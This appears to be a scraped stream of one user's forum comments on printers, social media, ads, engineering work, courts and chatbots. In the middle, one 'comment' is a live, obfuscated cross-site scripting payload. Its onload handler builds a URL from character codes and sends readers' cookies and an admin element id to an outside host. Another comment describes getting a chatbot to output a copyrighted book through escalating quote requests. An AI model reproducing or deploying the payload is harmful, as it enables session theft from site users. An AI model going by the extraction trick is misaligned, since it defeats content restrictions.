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Joined 1 years ago

You guys aren't washing your belts?


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Ok business idea

You buy the printer. The printer is made out of wood and metal. If you hit it with a hammer your hammer will break. It communicates only over Ethernet. Uses the default driver of the most popular desktop OSes. If you call support a surly man yells at you and tells you that this isn't fucking EAgames, you buy it you own it our business is concluded. You put whatever ink you want in it via a syringe. Your grandkids can inherit it when you die and it will still work. When it breaks you get out a screwdriver and pliers to fix it. The manual warning for electrical shock hazard is "if you are too dumb to fix it you deserve getting electrocuted. Please hire someone who can be trust with scissors to open this".

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Meanwhile at work I can't take a gift over five dollars and if I get like a box of chocolate I leave it in the break room.

Amazing how much integrity you must show is inverse to the amount of damages not showing it will cause.

because a meetup would be a lemmon party.

Citation needed

You are the product and right now the product is falling in value. I have known a few people who raise exotic animals and they treated them as nicely as a parent treats their own child. Now compare this to people who raise chickens.

The easy money is drying up. Hence you, the product, are worth less money. I personally don't really care all that much. The market was due for a correction well over a decade ago. The average person is worth about a dollar to Alphabet and when you think about how much you are getting the numbers never made sense. This dead weight mismatch has been skewing our entire economy. Engineers and project managers that would have gone into tangible items and paid for services instead were recruited to keep you on social media all day.

There are only a finite amount of techies and no one is going to care if slack integrated with Google maps if we are drowning in human sewage.

The internet is for porn. How you think net was born?

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I don't get those. Half of yt comments are "I like how x" where x is the plot of the video.

Sincerity, the last thing you still can't buy.

I buy my clothing at Goodwill because Walmart over charges.

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Leather ones you can wipe down with a rag and water. Canvas ones just go in the wash and you can air dry.

It definitely has its uses but it also has massive annoyances as you pointed out. One thing has really bothered me, I asked it a factual question about Mohammed the founder of Islam. This is how I a human not from a Muslim background would answer

"Ok wikipedia says this ____"

It answered in this long winded way that had all these things like "blessed prophet of Allah". Basically the answer I would expect from an Imam.

I lost a lot of trust in it when I saw that. It assumed this authority tone. When I heard about that case of a lawyer citing madeup caselaw from it I looked it as confirmation. I don't know how it happened but for some questions it has this very authoritative tone like it knows this without any doubt.

I watched my mom and dad grow old, not sure about up.

Generally speaking men pants are not form fitting.

What I was taught was try to take their conclusion and see how hard it is to maintain it. For example if someone were to argue with me about the truth of their particular branch of Christianity I should do is show how many assumptions I need to make to get to it. I.e. there is a god, this God is personal, this God favors human life, this God choose one particular tribe, this God waited all that time to send his son down.....

I don't know anything about the drama but back in the day I was in DevOps and pretty much every engineering tool we had strongly urged us to run it on the RHEL family. Also it was kinda nice that there was a phone number to call when things were going to heck. Plus for some reason I could always get drivers to work faster on fedora, which might have been my knowledge base. Not sure

Also for a corporation a red hat license is pennies so for them just having official support is worth it.

For individuals I don't think it really serves any use.

I ended up losing a friend because of reddit. They found it and just morphed from cheerful to always in a bad mood. Occasionally picking arguments with me from stuff they had seen on that site. At one point I just told them to stop going there, that they were becoming a nasty person because of it. She said she did but I didn't believe her.

Early march 2020 I am dealing with the lockdown and watching my entire life deathspiral. My toddler won't wear a mask, her older sister is crying because she misses her friends at school, I have no idea if I will have a job next week, and my wife is a nurse going into NYC hospital every day. All this going on and my friend sends me an email demanding I get her pictures of the corona beer public burnings going on. That she knows for a fact are happening because she read it on reddit.

I called her and I won't repeat what I said because I am highly confident it would get me in trouble with LEOs. Not a "hey I know you have small children and your wife works in a hospital in the hardest hit city in the US, are you okay? Is there anything I can do to help?". No, just an email trying to make fun of the people in my country.

" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"

It varied for me. For example I lurked on /r/watches and would watch as the group mind ripped to shreds anyone who dared showing a digital that wasn't Casio or a fashion watch. /R/PLC stayed good the whole time. I guess because we had a common enemy, everyone else in the universe.

I am starting to miss the echo chamber of YouTube. I am a fairly leftwing atheist in a solid blue state that ranks near last in religious observance. And yet roughly a quarter of the suggested videos/ads I get are for things like Epoch Times, Prager U, HeGetsUs, PJ Media.

Alright so the only way I am clicking on that stuff is by accident. From the advertisement point of view this is worse than selling iceboxes to Inuit, this is like trying to sell ribeye steaks to vegans with no money.

Which makes you wonder what the future holds. Say you are Epoch Times and you find out the YouTube is pushing your product on people who actively don't want to buy it how much longer are you going to pay Alphabet for a failed advertising campaign?

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As a former student now practicing engineer this habit never gets broken. All of us accept cargo cult computing to one extent or another. It sucks.

Usually the engineers with the least tolerance for it do better but only in the long run. In the short run they are yelled at for holding back projects.

Take the US for example with crippling student loan debt.

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When I travel abroad I try to drink bottled water from my home country for the first three days, after that I I drink the native stuff. A frequent traveler taught me this trick and it seems (yes I know anecdotal) to work.

Really not an expert on this stuff but I imagine there are just different bacteria in the water and that is what people are reacting to.

I got it to give me a book that was still in copyright status by selectively asking for bigger and bigger quotes. Took a while. Now it seems to have cottoned on to that trick.

I had a Twitter account for about a week that I posted with, after that I made a new one and never posted. The most toxic disgusting social media site I have ever been on. The one and only good thing about it was how the local governments where I lived used to make all announcements with it. I plan to bring my kids to the reading event at the library, better check Twitter. Oh it got moved an hour later. Also the local mass transit system used it.

I have been using it to do deep dives into subjects. Especially text analysis. Do you want to know the entire voc of the Gospel of Mark in original greek for example? 1080. Now how does this compare to a section of Plato's republic of the same size? About 6-7x as large.

So right there we can see why Mark is often viewed as a direct text while Plato is viewed as a more ambiguous writer.

for a 100 bucks I will be anything you want.

Around 5 years into it is when I felt like I finally hit my stride. Maybe it was because she went to kindergarten.

I got a bogus moving violation ticket in a ghetto. Decided to fight it. Watched as minority after minority got their ass handed to them in traffic court. Cops are super rude about everything. Few months later I get jury duty. Hispanic man accused of a violent crime...ok yeah. I have already seen how the sausage is made.

Now I didn't get picked they had enough before they even got to me but I admit I would be very disinclined to take the justice systems word. Maybe that is the wrong attitude to have. Just because the justice system is very very imperfect doesn't mean that there is no crime.

Everytime the justice system does something like this. Mistreats minorities or the poor, refuses to go after the powerful it weakens it's authority. And we are all worse off.


Homosexuals existing and wanting the same rights is not insanity or radical. It is basic human dignity.

What religion are you a member of?

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OEMs. The documentation for every factory machine my company builds included a 3-ring binder of the entire system documentation as well as a print out of the schematics. Go ahead and try to convince a factory owner that paid us a quarter of a million not to include a 2 dollar manual.

Also I will sometimes print out complicated schematics and let my intern mark it up with pen. Sometimes you catch mistakes by changing your perspective.

Explain on their level.

The internet is for hugs. The internet is for hugs. Why you think net was born? For hugs hugs hugs!

My very much hardware company has problems like this. Sometimes we can't deal with a customer direct we have to go thru another company. When that happens there is an entire layer of people insisting that we are doing everything wrong. Forcing us to produce mountains of paperwork and revisions.

Supposedly it is over. Wagner announced that they are no longer advancing.

Woah there. Let's not be too radical

Sorry all we care about is some rich f***s on a submarine

Yes which is why you made one just now.

Criticism of the economic policies of a group that is focused on economic policy is appropriate.

Sorry your bff's like student loans debt

Downplay your views on student loans

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